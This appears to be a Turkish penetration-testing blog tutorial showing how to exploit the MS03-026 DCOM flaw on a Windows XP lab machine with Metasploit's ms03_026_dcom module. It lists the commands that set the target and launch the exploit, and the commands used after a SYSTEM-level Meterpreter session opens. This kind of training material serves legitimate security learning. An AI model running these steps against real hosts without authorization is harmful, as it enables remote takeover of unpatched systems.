MSF ms03_026_dcom İstismar Modülü ile İşletim Sistemi Zafiyetin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows XP SPO işletim sisteminde MS03-026 zafiyetinin Metasploit Framework ile istismar edilecek ve SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS03-026 zafiyetinin tespit edildiği görülmektedir.

acquiring-meterpreter-shell-on-windows-by-using-msf-ms03-026-dcom-module-01

Metasploit üzerinde ilgili modülün (MSF ms03_026_dcom istismar modülü) seçenekleri aşağıdaki gibidir:

search ms03-026
use exploit/windows/smb/ms03_026_dcom
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-ms03-026-dcom-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.

set RHOST 192.168.244.138
show options
exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-ms03-026-dcom-module-03

Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.

sysinfo
getuid
getpid
ps

acquiring-meterpreter-shell-on-windows-by-using-msf-ms03-026-dcom-module-04

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.